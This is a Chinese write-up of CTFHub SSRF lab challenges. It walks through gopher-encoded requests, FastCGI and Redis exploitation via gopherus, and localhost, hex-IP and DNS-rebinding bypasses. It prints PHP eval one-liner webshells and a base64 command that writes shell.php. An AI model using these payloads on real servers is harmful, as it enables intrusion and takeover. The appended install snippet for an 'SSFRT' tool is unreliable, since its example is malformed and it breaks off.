CFTHub-web-ssrf

一.内网访问

1.开启环境

2.根据题目得知访问位于127.0.0.1下的flag.php 所以我们在url后加上http://127.0.0.1/flag.php

3.复制提交flag

二.伪协议读取文件

1.开启环境

2.网站的目录文件一般都放在var/www/html目录下,我们可以输入file:///var/www/html/flag.php回车

(关于file协议:用于访问本地计算机中的文件

    格式:file:///文件路径

   可以在资源管理器或IE地址栏中输入:file:///文件路径)

3.鼠标右击查看页面源代码找出flag

三.端口扫描

1.开启环境

2.开启

3.开启BurpSuite抓包发右击选择送到Intruder

4.给端口8000添加payload位置

5.修改条件开始攻击

6.点击响应得到我们的flag

四.POST请求

1.开启环境

2.访问flag.php,出现搜索框

3.右击查看页面源代码找到key输到上一个页面的输入框

4.进行bp抓包

5.把没用的删掉host改为127.0.0.1:80

6.进行编码CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

复制到记事本进行替换%0A替换为%0D%0A  替换后最后再加%0D%0A进行二次编码

二次编码

7.复制到地址栏用gopher协议,成功找到flag

五.上传文件

1.开启环境

2.访问flag

3.在页面添加提交按钮,f12,右击编辑html

4.选择文件提交抓包,删除不用的

5.进行编码复制到记事本替换%0A为%0D%0A后面加上%0D%0A

6.在进行二次转码

7.复制到地址栏用gopher协议即可找到flag

六.FastCGI协议

1.开启环境

2.输入命令

一句话木马
<?php @eval($_POST['x']);?>
base64编码后
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

3.进行编码

4.使用菜刀工具将上边网页地址复制进去

5.在根目录下即可找到flag

七.redis协议

1.开启环境

2.使用kali打开终端

python2 gopherus.py--exploit redis
一句话木马:<?php @eval($_GET[cmd]);?>

3.讲payload进行编码上传

4.打开我们的工具菜刀在根目录下可找到flag

八.URL  Bypass

2.http://notfound.ctfhub.com 在后面输入@127.0.0.1/flag.php可绕过得到flag

九.数字IP Bypass

1.开启环境

2.我们将127.0.0.1换成localhost即可成功解出flag

十.302跳转 Bypass

1.开启环境

2.将127.0.0.1转换为十六进制即可表示为0x7f000001

十一.DNS重绑定 Bypass

1.开启环境

附件网站:

https://lock.cmpxchg8b.com/rebinder.html

2.在解析网站上获取解析到内网IP的域名并作访问即可获取其flag

  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF (Server Side Request Forgery) 测试是一个用于检测服务器端请求伪造漏洞的工具,它是一种常见的安全测试技术。为了安装 SSFRT 这一工具,你可以按照以下步骤操作: ### 安装依赖 首先,确保你的系统已安装 Python 和 pip(Python 的包管理器)。在命令行界面输入: ```bash pip install -r requirements.txt ``` 如果你是使用基于 Debian 或者 Ubuntu 的 Linux 发行版,则需要先安装 `libffi-dev`、`libssl-dev`、`python-dev` 等库,可以通过运行以下命令完成: ```bash sudo apt-get update sudo apt-get install libffi-dev libssl-dev python-dev ``` 接着,在你的项目目录中创建一个名为 `requirements.txt` 的文件,并添加所需的依赖(通常包括 `requests` 库),然后再次使用 `pip` 来安装: ```txt # requirements.txt 文件内容示例 requests==2.26.0 pip install -r requirements.txt ``` ### 安装 SSFRT 工具 使用 Git 克隆 SSFRT 的仓库到本地: ```bash git clone https://github.com/ssertool/ssftrt.git cd ssftrt pip install . ``` 或者从 PyPI 直接安装(如果已发布): ```bash pip install ssftrt ``` ### 使用 SSFRT 一旦 SSFRT 成功安装,你可以在 Python 脚本中导入并使用它来进行 SSRF 测试。典型的用法如下: ```python from ssertool.ssftrt import SSFRT ssf = SSFRT() results = ssf.scan('http://example.com', {'param': 'http://target.example.com'}) print(results) ``` 在这个例子中,我们尝试通过 `http://example.com` 的 URL 发起请求,其中 `param` 参数指向了目标 URL `http://target.example.com`。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值